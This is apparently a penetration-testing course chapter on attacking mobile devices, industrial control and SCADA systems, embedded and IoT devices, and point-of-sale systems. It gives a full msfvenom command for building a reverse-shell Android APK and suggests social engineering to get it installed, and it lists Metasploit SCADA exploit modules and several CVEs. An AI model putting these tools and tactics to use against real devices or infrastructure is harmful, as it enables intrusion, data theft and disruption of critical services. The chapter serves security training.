Specialized Systems

Attack

Mobile Devices

Mobile devices, particularly smartphones and tablets, are an important tool in many organizations. In today’s world, an employee’s mobile device might be just as attractive to an attacker because it can hold sensitive company data and private personal data, not to mention its usefulness as an authentication mechanism. Therefore, it may be in your interests to test the client’s mobile workforce and infrastructure for weaknesses, particularly to malware.

The approach you take will depend heavily on the mobile platform that devices are using. The iOS platform is more restrictive and therefore has fewer opportunities for exploitation. By default, iOS devices can only install apps from the official App Store, which itself has some measure of quality control to keep malware out. Nevertheless, malware has made its way onto the App Store on several occasions. The jailbreaking process enables devices to install apps from third-party sources, so you might be able to leverage social engineering tactics to get users to install malware.

The Android OS is usually a better bet when it comes to exploiting mobile devices. Android is much less restrictive than iOS by design, and a change of a single setting can make it possible for the device to install apps from third-party sources. The rooting process reduces the device’s security even further, enabling apps to run outside of their sandbox environments and assume high-level privileges, interacting with the kernel and other apps on the device. This can enable you to exfiltrate sensitive data, capture session information, and even leave a device non-functional.

The following example uses a tool called msfvenom, part of the Metasploit Framework, to create a malicious app package for Android devices:

msfvenom -p android/meterpreter/reverse_tcp LHOST=<attacker IP address> LPORT=<available port> R > malware.apk

This creates a reverse TCP listener back to the attacker’s machine and saves it as an app package, or APK file. APK files are the installation file format for Android. Assuming the user enables installation of apps from unknown sources, they simply need to run the installer to infect their device. Back on the attack machine, you can set up Metasploit to handle the incoming connection by, say, opening a shell onto the device.


Industrial Control Systems

As discussed earlier in the course, an industrial control system (ICS) is any system that enables users to control industrial and critical infrastructure assets over a network. Critical infrastructure refers to resources that, if damaged or destroyed, would cause significant negative impact to the economy, public health and safety, or security of a society. For example, water suppliers, electricity generators, health services, transportation services, etc., are considered critical infrastructure.

Many ICSs were established years before security standards were established, and as a result, are considerably outdated. As more ICSs are being incorporated in the organization’s TCP/IP network, there is greater opportunity for exploitation. One open source tool for ICS exploitation is ICSSPLOIT. ICSSPLOIT, written in Python, has a similar syntax to Metasploit, and includes various modules that take advantage of an ICS’s programmable logic controllers (PLCs). PLCs are the components that directly control industrial systems. Example ICSSPLOIT modules include:

  • Controlling start/stop functionality for specific vendor controllers.
  • Executing remote commands on controllers running specific real-time operating systems.
  • Crashing TCP services running on controllers.
  • Triggering a DoS through remote procedure call (RPC) services.

SCADA

The most prominent type of ICS is a supervisory control and data acquisition (SCADA) system. A SCADA network sends remote control signals to industrial assets used by critical infrastructure utilities. The SCADA also receives information about the state of these assets to analyze or troubleshoot any problems they may be experiencing. For example, an engineer may use a SCADA system to receive information about the pressure and volume of water in a tank at a treatment plant, while also using the SCADA to adjust those factors to run the tank more efficiently.

SCADA systems and networks are now being integrated into the enterprise network, and modern SCADA systems can interface with the TCP/IP stack. Like other networked ICSs, a networked SCADA presents new opportunities for exploitation. Metasploit has several modules in the exploit/windows/scada category that target vendor-specific SCADA components running Windows. Many of these trigger buffer overflows. Some examples include:

  • exploit/windows/scada/advantech_webaccess_webvrpcs_bof—Triggers a stack overflow against a web service.
  • exploit/windows/scada/daq_factory_bof—Triggers a stack overflow by sending excessive requests to a service port.
  • exploit/windows/scada/advantech_webaccess_dashboard_file_upload—Enables file upload to web server and arbitrary code execution.
  • exploit/windows/scada/codesys_gateway_server_traversal—Enables directory traversal on server.
  • exploit/windows/scada/igss_exec_17—Enables remote command injection.

As you can probably tell, these modules do not apply to all SCADA components. You may need to do more research or reconnaissance to determine the make and model of the SCADA components the target organization is running, and if Metasploit actually has a relevant module. There are, of course, other tools out there that can help you exploit SCADA systems.


Embedded Systems

Embedded systems are computer hardware and software systems that have a specific function within a larger system. This can include everything from home appliances like a microwave to large industrial machinery. Embedded systems are used in SCADA and other ICSs. The hardware in an embedded system is typically more consolidated and less complex than a traditional computer.

In order to best support this lack of hardware complexity, embedded operating systems focus on maximizing resource efficiency. They tend to be heavily stripped down versions of standard OSs with fewer features. As a result, embedded OSs rarely incorporate robust security practices. Embedded Linux distributions and Windows Embedded Compact are popular examples of embedded OSs.

For the purposes of exploitation, many of the reconnaissance tools you’ve used to discover information on traditional computers will be useful for targeting embedded OSs. For example, you can discover open ports and running services by performing a scan of the system. Embedded OSs often come with a web-based interface for configuration, and as such may be susceptible to various web-based exploits.


Real-Time Operating Systems

A real-time operating system (RTOS) is a special type of embedded OS. In a general-purpose OS, embedded or not, the system uses a scheduler in order to balance processor time for each running process or user. This can make task completion times variable depending on a number of factors. In an RTOS, the scheduler is much more predictable and consistent. This makes an RTOS ideal for embedded systems, as they tend to have strict requirements for when a task should be completed, and do not have particularly taxing workloads.

Like other embedded OSs, RTOSs often do not incorporate security features like Data Execution Prevention (DEP), though this depends on the OS and the actual hardware product it runs on. There have been several vulnerabilities discovered in RTOSs. Examples include:

  • Remote code execution against Broadcom Wi-Fi chips running the VxWorks RTOS (CVE-2017-9417).
  • Denial of service against the RPC protocol running on VxWorks (CVE-2015-7599).
  • Buffer overflow against BlackBerry devices using QNX Neutrino RTOS enabling denial of service or code execution (CVE-2013-2688).
  • Buffer overflow against QNX Momentics RTOS enabling privilege escalation (CVE-2008-3024).

As with other embedded components and systems, these exploits are highly specialized and only certain ones may apply to your target environment.


Internet of Things

The Internet of Things (IoT) is a network of objects (electronic or not) that are not traditional computers, but are connected to the wider Internet using embedded electronic components. IoT devices can be everything from networked home automation systems to ICSs that have external connectivity to the wider world, and many more “things” in between.

IoT devices are notorious for their poor security, and several major exploits have been seen in the wild. For example, the Mirai bot malware spread to thousands of IoT devices like IP cameras and baby monitors that still had their default credentials set. These infected devices formed a large botnet that triggered several high-profile DoS attacks, including taking down name servers operated by Dyn, a DNS provider for Amazon, Twitter, GitHub, and many more domains.

While a botnet might be beyond your pen test scope and abilities, there are many vulnerabilities in IoT products that you can leverage in exploitation. Many of these involve taking control of the device by inputting default credentials. In many cases, the manufacturer has hard-coded these credentials and made them very difficult or impossible to remove. You should research the default credentials for each IoT product you target during the pen test.

Some example vulnerabilities that don’t involve default credentials include:

  • Buffer overflow against Snapdragon Automobile and IoT devices (CVE-2017-14910).
  • SQL injection against Faleemi FSC-880 wireless IP cameras (CVE-2017-14743).
  • SYN flood against iSmartAlarm home security devices, enabling DoS (CVE-2017-7730).
  • Privilege escalation against Summer Baby Zoom Wifi Monitor & Internet Viewing System (CVE-2015-2889).

Point of Sale Systems

The point of sale (POS) refers to the place where customers purchase goods or services from a business, and a POS system incorporates devices and networking capabilities that support this practice. POS devices can include everything from cash registers to mobile devices like tablets and smartphones. These devices are networked to backend servers that process and store transactional data, payment card data, and more.

Exploiting the frontend devices in a POS system might enable you to access sensitive sales and financial data. Mobile devices might be more familiar to you, but typically incorporate better security practices than older specialized devices like payment card terminals and barcode scanners. Compromising these devices can enable you to read or manipulate payment information before it is sent to a server for processing and storage.

There might also be opportunities for you to compromise the backend servers in a POS system. For example, researchers discovered that SAP POS systems failed to authenticate command requests, enabling anyone connected to the network to upload a configuration file to the checkout server to gain access to administrative functionality. An attacker could use this functionality to change prices, read sensitive payment data, or trigger a DoS on the POS system. Because the backend server is likely to be running a common operating system such as Windows or Linux, with a SQL Server database installed, it is vulnerable to all of the same attacks as any other server. Retail stores tend to be large and open to the public. It could be easy for an attacker to simply find an Ethernet cable and plug their attack machine into the network.


Guidelines for Exploiting Specialized Systems

When exploiting specialized systems:
  • Take inventory of all target assets that run specialized, non-traditional computing systems.
  • Research the manufacturer and specific model of each targeted specialized system and device.
  • Consider the inherent security differences in mobile OS platforms.
  • Identify rooted and jailbroken devices as potentially easier targets for exploitation.
  • Generate a malicious APK using msfvenom to compromise Android devices.
  • Use social engineering tactics to entice Android users into installing a malicious APK.
  • Use a tool like ICSSPLOIT to target specific ICS vulnerabilities.
  • Search for and use Metasploit modules that target SCADA systems.
  • Use standard reconnaissance tools against embedded operating systems to discover open ports and running services.
  • Use web-based exploits against web interfaces commonly found on embedded OSs.
  • Research vulnerabilities associated with specific real-time operating systems.
  • Research default credentials for specific IoT devices like IP cameras.
  • Compromise frontend point of sale devices to read or modify sensitive financial data before processing and storage.
  • Research vulnerabilities in backend POS servers to compromise financial data.

Leave a Reply

Your email address will not be published. Required fields are marked *